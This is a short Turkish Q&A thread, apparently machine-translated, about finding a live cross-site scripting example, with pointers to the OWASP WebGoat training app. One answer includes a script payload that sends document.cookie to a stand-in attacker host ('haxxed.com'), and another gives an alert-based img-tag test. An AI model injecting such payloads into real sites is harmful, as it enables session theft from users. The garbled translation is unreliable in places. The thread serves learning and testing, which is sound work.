2012-03-06 19 views

cevap

5

Genelde canlı bir XSS örneği için kendi sunucu tarafı yazılımınızı yüklemeniz gerekir. Pek çok meşru site, web sörfçülerine kasıtlı olarak bir XSS hatası açacaktır.

Kendinize XSS (diğer pek çok şey arasında) gösterebilmenizi sağlayan hazır bir sunucu tarafı yazılım parçası, OWASP Web Gezgini'dir. İşte instructions to install WebGoat and demonstrate XSS. OSSASP makalesinde "Cross-site scripting (XSS)" makalesinde XSS'yi etkinleştiren ek program parçacıkları örnekleri bulacaksınız.

5

<img src="javascript:alert('hello everybody')"></img> Eklediğim resim etiketi xss örneğidir. Yukarıdaki src sizi uyaran java betiğini içerir.

+2

Bu hiçbir şey yapmıyor! –

0

Basit Biçim de şu şekilde olurdu: Eğer ileti kutusu, sayfanın veya sunucunun savunmasız olduğunu gösterir.

<script>window.location = 'haxxed.com? cookie=' + document.cookie</script> 

teknik çalışmaları burada bulabilirsiniz nasıl büyük bir örnek https://www.hacksplaining.com/exercises/xss-stored